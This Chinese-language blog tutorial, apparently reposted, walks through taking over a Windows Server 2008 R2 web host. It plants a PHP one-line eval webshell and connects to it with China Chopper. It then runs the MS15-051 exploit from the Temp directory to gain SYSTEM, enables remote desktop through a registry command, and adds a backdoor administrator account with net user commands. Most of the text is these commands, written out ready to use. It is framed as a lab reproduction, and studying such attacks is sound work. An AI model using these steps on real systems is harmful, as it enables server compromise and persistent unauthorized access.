admin 管理员组文章数量: 1086019
「作者简介」:冬奥会网络安全中国代表队,CSDN Top100,就职奇安信多年,以实战工作为基础著作 《网络安全自学教程》,适合基础薄弱的同学系统化的学习网络安全,用最短的时间掌握最核心的技术。
操作系统: Windows Server 2008 R2 Enterprise
Web环境: PHPstudy( PHP+Apache+MySQL)
第一步,上传一句话木马到Web网站根路径并使用中国菜刀连接
<?php eval($_POST[-7]);?>
第二步,使用中国菜刀查看系统信息,根据系统没安装的补丁进行提权
第三步,使用中国菜刀上传漏洞工具( 此处使用MS15-051漏洞工具)提权
Windows系统的回收站和c:\windows\Temp目录默认具有上传和执行权限,所以我们将漏洞工具上传至c:\windows\Temp目录下
使用中国菜刀打开虚拟终端,查看当前用户权限
C:\phpStudy\PHPTutorial\WWW\> c:\windows\temp\ms15-051x64.exe whoami第四步,开启3389( 远程桌面 )端口
上传a.bat文件至c:\windows\temp目录下,内容为开启3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f使用中国菜刀打开虚拟终端,执行a.bat文件
C:\xxx\WWW\> c:\windows\temp\ms15-051x64.exe "c:\windows\temp\a.bat"查看3389端口是否开启
C:\xxx\WWW\> c:\windows\temp\ms15-051x64.exe "netstat -ano"第五步,添加管理员用户
添加普通用户tom
c:\windows\temp\ms15-051x64.exe "net user tom 123456.qwer /add"将普通用户tom添加至管理员组,拥有管理员权限
c:\windows\temp\ms15-051x64.exe "net localgroup administrators tom /add"第六步,连接远程桌面
物理机开启远程桌面
本文标签: 系统漏洞
版权声明:本文标题:Windows2008系统漏洞提权复现 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.roclinux.cn/b/1738285302a1956932.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论